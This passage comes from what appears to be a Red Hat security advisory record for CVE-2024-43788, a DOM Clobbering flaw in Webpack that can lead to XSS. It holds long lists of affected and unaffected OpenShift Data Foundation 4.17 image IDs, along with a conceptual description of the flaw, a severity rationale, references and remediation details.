"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", 